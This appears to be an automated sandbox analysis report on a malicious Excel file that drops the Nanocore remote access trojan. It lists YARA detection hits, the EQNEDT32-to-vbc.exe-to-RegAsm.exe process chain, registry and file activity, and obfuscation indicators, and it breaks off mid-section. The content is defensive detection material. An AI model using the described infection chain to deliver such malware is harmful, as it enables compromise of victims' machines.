          Source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.c10000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.c10000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.cb0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.cb0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.3b73634.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.3b73634.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.5c0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.5c0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.c00000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.c00000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.6c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.6c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.660000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.660000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.a50000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.a50000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.e10000.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.e10000.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.e14c9f.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.e14c9f.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.2a5109c.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.2a5109c.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.2a5109c.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.2a3fd90.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.2a3fd90.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.2a3fd90.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.2a44ddc.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.2a44ddc.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 5.2.RegAsm.exe.2a44ddc.25.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: new[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: win33.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
          Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
          Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
          Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
          Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
          Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
          Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@6/20@41/2
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Ref 0180066743.xlsxJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{4614bd42-26c0-4da0-8e09-16890d37c1d7}
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREA4E.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Ref 0180066743.xlsxReversingLabs: Detection: 21%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: Ref 0180066743.xlsxStatic file information: File size 1250304 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: j,C:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000005.00000002.2367359268.000000000577C000.00000004.00000001.sdmp
          Source: Binary string: *:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000005.00000002.2367318598.0000000005404000.00000004.00000001.sdmp
          Source: Binary string: inC:\Windows\System.pdb *{ source: RegAsm.exe, 00000005.00000002.2367359268.000000000577C000.00000004.00000001.sdmp
          Source: Binary string: RegAsm.pdb source: RegAsm.exe, RegAsm.exe.4.dr
          Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegAsm.exe, 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp
          Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegAsm.exe, 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp
          Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegAsm.exe, 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp
          Source: Ref 0180066743.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Ref 0180066743.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: new[1].exe.2.dr, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.cs.Net Code: Hn9GJ4JDT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: win33.exe.4.dr, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.cs.Net Code: Hn9GJ4JDT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.vbc.exe.df0000.3.unpack, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.cs.Net Code: Hn9GJ4JDT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.vbc.exe.df0000.0.unpack, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.cs.Net Code: Hn9GJ4JDT System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Yara detected Costura Assembly LoaderShow sources
